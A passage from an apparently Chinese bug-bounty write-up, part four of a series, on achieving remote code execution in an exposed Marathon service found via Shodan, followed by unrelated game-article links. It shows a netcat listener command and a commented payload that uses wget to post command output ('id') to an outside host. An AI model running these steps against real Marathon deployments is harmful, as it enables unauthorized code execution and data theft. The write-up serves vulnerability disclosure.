挖洞经验 | 通过Shodan发现目标应用Marathon服务的RCE漏洞( 四 )
这样一来 , 我就可以在我自己的服务器上来部署监听上述Marathon服务的实例了 , 通过此种方法 , 间接实例对Marathon服务的的远程代码执行(RCE) , 方法如下:
1、在我自己的服务器上设置对端口55555的监听:
#set your own server to wait the response
root@h0st:~# nc -lvvv 55555
2、用Curl命令创建一个 Marathon 服务运行实例 , 并通过该实例来执行cmd命令 , 其中的attacker_server即为我服务器的IP地址 。 具体命令如下:
# create a marathon application that will be execute any command that you want (in this case is /usr/bin/wget --user-agent=marathon-id --post-data=https://mparticle.uc.cn/api/`id`)
# replace attacker_server with your listening server that you set up with netcat and the \"rce-id\" tag with your own custom tag this is the Marathon application name
推荐阅读
- 梦幻西游|梦幻西游:千亿经验奖励5连击!长久地坚持在此刻能否收获幸运?
- 手机游戏|梦幻西游手游:如何保证贸易少亏甚至小赚 小号、经验环必不可少
- 我的世界|我的世界:“最奢侈”的附魔是什么?我给胡萝卜钓竿打上经验修补
- 盲僧|LOL手游盲僧是英雄代表?灵药再推进阶教学,双区王者的经验
- 传奇世界|传奇世界:获声望的几种途径经验
- 大话西游2|大话西游2:一头年兽6千万经验,玩家怒刷3小时,疯狂上电视!
- 戒指|梦幻西游:10张玲珑图全程无经验,宝石还只出了一个!
- 挂机|玩游戏赚钱,个人总结日进200经验,有电脑就行!
- 梦幻西游|梦幻西游:文哥全服第1经验号过户,浩文预定了1800亿经验女号!
- 戒指|梦幻西游:一个宝箱有6次祈愿次数,里面藏了多少经验和指南书?